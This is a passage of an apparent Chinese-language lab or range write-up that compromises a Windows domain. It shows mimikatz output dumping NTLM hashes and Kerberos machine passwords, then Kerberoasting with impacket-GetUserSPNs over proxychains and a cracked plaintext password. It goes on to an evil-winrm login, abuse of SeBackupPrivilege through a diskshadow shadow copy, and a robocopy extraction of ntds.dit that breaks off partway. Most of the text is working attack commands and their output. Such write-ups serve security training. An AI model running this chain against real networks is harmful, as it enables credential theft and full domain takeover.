         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 6364756 (00000000:00611e54)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/4/25 14:59:46
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2373942 (00000000:00243936)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2025/4/25 14:11:13
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64868 (00000000:0000fd64)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:33
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 8519c5a89b2cd4d679a5a36f26863e5d
         * SHA1     : 42d8188bc30ff0880b838e368c6e5522b86f978d
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64850 (00000000:0000fd52)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:33
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:32
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33887 (00000000:0000845f)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:32
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8713155 (00000000:0084f3c3)
Session           : RemoteInteractive from 4
User Name         : yiyi
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/4/25 15:14:29
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : yiyi
         * Domain   : XR-0923
         * NTLM     : 6912928308e3cda903e6d75bd6091a20
         * SHA1     : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
        tspkg :
        wdigest :
         * Username : yiyi
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : yiyi
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8713105 (00000000:0084f391)
Session           : RemoteInteractive from 4
User Name         : yiyi
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/4/25 15:14:29
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : yiyi
         * Domain   : XR-0923
         * NTLM     : 6912928308e3cda903e6d75bd6091a20
         * SHA1     : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
        tspkg :
        wdigest :
         * Username : yiyi
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : yiyi
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8698231 (00000000:0084b977)
Session           : Interactive from 4
User Name         : DWM-4
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/25 15:14:28
SID               : S-1-5-90-0-4
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8696408 (00000000:0084b258)
Session           : Interactive from 4
User Name         : DWM-4
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/25 15:14:28
SID               : S-1-5-90-0-4
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 8386179 (00000000:007ff683)
Session           : RemoteInteractive from 3
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/4/25 15:13:49
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 6364785 (00000000:00611e71)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/4/25 14:59:46
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:35
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:33
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33960 (00000000:000084a8)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:32
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 32814 (00000000:0000802e)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:32
SID               :
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : b486c9b11e2af380c736f0d618d9bc23
         * SHA1     : b83def29fbbb46ed8cfd80cbdacdfcca1a6b4ca6
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/4/25 13:49:32
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : 60 72 b7 6f 17 96 27 c4 d2 a4 fe 19 88 60 d3 31 15 3f e6 e0 a2 0f 33 5a 0c 60 5f 4b c3 ff 0d 8b ab 99 d8 38 3a 51 93 21 e4 ec 33 61 60 2f a6 fd 29 62 4e c1 c7 2b 65 cb 20 29 b8 30 d3 cb 36 9c 7b 19 78 35 da e2 ee 0e 14 a8 54 b4 cd 48 92 aa 06 74 d0 6a 13 ec ca cf 6a 30 3e 4c ee ca b4 b1 1c 01 11 e9 c1 10 b2 ad de ae 86 9e 74 b1 47 34 14 b6 a6 ee 76 62 2b 84 1a 88 c4 d7 ee 53 40 f5 67 ea b6 09 5d b8 fc 85 8d 17 69 fd d6 85 e6 36 b6 63 a0 68 f1 e0 aa 03 b2 43 0d c6 ff e5 06 03 e3 0f 52 5a f0 f5 24 58 13 0f 30 62 f6 9c 63 24 83 6d 86 8e dc 02 33 df 9c 0a 11 90 57 e0 f0 5e ba 57 04 f5 c3 3d fa 0f 07 da 7d 77 6c c6 01 76 ec f4 1a 2b b5 8f 62 e0 39 fb 2e ab 13 91 9f 1a 3c 36 5a 06 1e 7d 12 bf 8e 9e c3 3f 7a 47 04 fc
        ssp :
        credman :
        cloudap :

mimikatz #

拿着XR-0923$的凭据去收集信息

┌──(root㉿kali)-[~]
└─# proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':b486c9b11e2af380c736f0d618d9bc23' -dc-ip 172.22.14.11
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:389  ...  OK
ServicePrincipalName           Name      MemberOf                                                  PasswordLastSet             LastLogon  Delegation 
-----------------------------  --------  --------------------------------------------------------  --------------------------  ---------  ----------
TERMSERV/xr-0923.xiaorang.lab  tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 06:25:11.564883  <never>               
WWW/xr-0923.xiaorang.lab/IIS   tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 06:25:11.564883  <never>

抓哈希

1	proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':b486c9b11e2af380c736f0d618d9bc23' -dc-ip 172.22.14.11 -request-user tianjing

如果时间差的大就同步一下

1
2
3

ntpdate 172.22.14.11
或者
date -s "2025-04-25 14:55:00"

得到密码拿hashcat爆破一下

得到

1	tianjing:DPQSXSXgh2

evilwin

┌──(root㉿kali)-[~]
└─# proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
*Evil-WinRM* PS C:\Users\tianjing\Documents> whoami /priv
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK

特权信息
----------------------

特权名                        描述             状态
============================= ================ ======
SeMachineAccountPrivilege     将工作站添加到域 已启用
SeBackupPrivilege             备份文件和目录   已启用
SeRestorePrivilege            还原文件和目录   已启用
SeShutdownPrivilege           关闭系统         已启用
SeChangeNotifyPrivilege       绕过遍历检查     已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集   已启用
*Evil-WinRM* PS C:\Users\tianjing\Documents>

有备份以及还原文件或目录的权限，可以卷影拷贝然后读sam(SAM是安全账户管理器数据库，包含了本地用户及用户组,包括它们的口令及其他属性，位于注册表的HKLM\SAM下面)

┌──(root㉿kali)-[~]
└─# cd /tmp       
                                                                                                                                                                                        
┌──(root㉿kali)-[/tmp]
└─# vi raj.dsh          
                                                                                                                                                                                        
┌──(root㉿kali)-[/tmp]
└─# unix2dos raj.dsh
unix2dos: 正在转换文件 raj.dsh 为DOS格式...
                                                                                                                                                                                        
┌──(root㉿kali)-[/tmp]
└─# proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
*Evil-WinRM* PS C:\Users\tianjing\Documents> cd yiyi
*Evil-WinRM* PS C:\Users\tianjing\Documents\yiyi> upload raj.dsh
                                        
Info: Uploading /tmp/raj.dsh to C:\Users\tianjing\Documents\yiyi\raj.dsh
                                        
Data: 112 bytes of 112 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\tianjing\Documents\yiyi> diskshadow /s raj.dsh
Microsoft DiskShadow 版本 1.0
版权所有 (C) 2013 Microsoft Corporation
在计算机上: XR-DC，2025/4/25 15:42:56

-> set context persistent nowriters
-> add volume c: alias raj
-> create
已将卷影 ID {ed43e50c-a0ae-4b0d-90a7-f1d320ee89f4} 的别名 raj 设置为环境变量。
已将卷影集 ID {2d648b54-7b88-408a-8b43-87b38d8e5478} 的别名 VSS_SHADOW_SET 设置为环境变量。

正在查询卷影副本集 ID 为 {2d648b54-7b88-408a-8b43-87b38d8e5478} 的所有卷影副本

        * 卷影副本 ID = {ed43e50c-a0ae-4b0d-90a7-f1d320ee89f4}          %raj%
                - 卷影副本集: {2d648b54-7b88-408a-8b43-87b38d8e5478}    %VSS_SHADOW_SET%
                - 卷影副本原始数 = 1
                - 原始卷名称: \\?\Volume{4790f32e-0000-0000-0000-100000000000}\ [C:\]
                - 创建时间: 2025/4/25 15:42:57
                - 卷影副本设备名称: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - 原始计算机: XR-DC.xiaorang.lab
                - 服务计算机: XR-DC.xiaorang.lab
                - 未暴露
                - 提供程序 ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - 属性:  No_Auto_Release Persistent No_Writers Differential

已列出的卷影副本数: 1
-> expose %raj% z:
-> %raj% = {ed43e50c-a0ae-4b0d-90a7-f1d320ee89f4}
已成功将卷影副本暴露为 z:\。
->
Evil-WinRM* PS C:\Users\tianjing\Documents\yiyi> RoboCopy /b z:\windows\ntds . ntds.dit
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Windows 的可靠文件复制
-------------------------------------------------------------------------------

  开始时间: 2025年4月25日 15:43:56
        源: z:\windows\ntds\
      目标: C:\Users\tianjing\Documents\yiyi\

      文件: ntds.dit

      选项: /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            新文件                16.0 m        ntds.dit
  0.0%
  0.3%
  0.7%
  1.1%
  1.5%
  1.9%
  2.3%
  2.7%
  3.1%
  3.5%
  3.9%
  4.2%
  4.6%
  5.0%
  5.4%
  5.8%
  6.2%
  6.6%
  7.0%
  7.4%
  7.8%
  8.2%
  8.5%
  8.9%
  9.3%
  9.7%
 10.1%
 10.5%
 10.9%
 11.3%
 11.7%
 12.1%
 12.5%
 12.8%
 13.2%
 13.6%
 14.0%
 14.4%
 14.8%
 15.2%
 15.6%
 16.0%
 16.4%
 16.7%
 17.1%
 17.5%
 17.9%
 18.3%
 18.7%
 19.1%
 19.5%
 19.9%
 20.3%
 20.7%
 21.0%
 21.4%
 21.8%
 22.2%
 22.6%
 23.0%
 23.4%
 23.8%
 24.2%
 24.6%
 25.0%
 25.3%
 25.7%
 26.1%
 26.5%
 26.9%
 27.3%
 27.7%
 28.1%
 28.5%
 28.9%
 29.2%
 29.6%
 30.0%
 30.4%
 30.8%
 31.2%
 31.6%
 32.0%
 32.4%
 32.8%
 33.2%
 33.5%
 33.9%
 34.3%
 34.7%
 35.1%
 35.5%
 35.9%
 36.3%
 36.7%
 37.1%
 37.5%
 37.8%
 38.2%
 38.6%
 39.0%
 39.4%
 39.8%
 40.2%
 40.6%
 41.0%
 41.4%
 41.7%
 42.1%
 42.5%
 42.9%
 43.3%
 43.7%
 44.1%
 44.5%
 44.9%
 45.3%
 45.7%
 46.0%
 46.4%
 46.8%
 47.2%
 47.6%
 48.0%
 48.4%
 48.8%
 49.2%
 49.6%
 50.0%
 50.3%
 50.7%
 51.1%
 51.5%
 51.9%
 52.3%
 52.7%
 53.1%
 53.5%
 53.9%
 54.2%
 54.6%
 55.0%
 55.4%
 55.8%
 56.2%
 56.6%
 57.0%
 57.4%
 57.8%
 58.2%
 58.5%
 58.9%
 59.3%
 59.7%
 60.1%
 60.5%
 60.9%
 61.3%
 61.7%
 62.1%
 62.5%
 62.8%
 63.2%
 63.6%
 64.0%
 64.4%
 64.8%
 65.2%
 65.6%
 66.0%
 66.4%
 66.7%
 67.1%
 67.5%
 67.9%
 68.3%
 68.7%
 69.1%
 69.5%
 69.9%
 70.3%
 70.7%
 71.0%
 71.4%
 71.8%
 72.2%
 72.6%
 73.0%
 73.4%
 73.8%
 74.2%
 74.6%
 75.0%
 75.3%
 75.7%
 76.1%
 76.5%
 76.9%
 77.3%
 77.7%
 78.1%
 78.5%
 78.9%
 79.2%
 79.6%
 80.0%
 80.4%
 80.8%
 81.2%
 81.6%
 82.0%
 82.4%
 82.8%
 83.2%
 83.5%
 83.9%
 84.3%
 84.7%
 85.1%
 85.5%
 85.9%
 86.3%
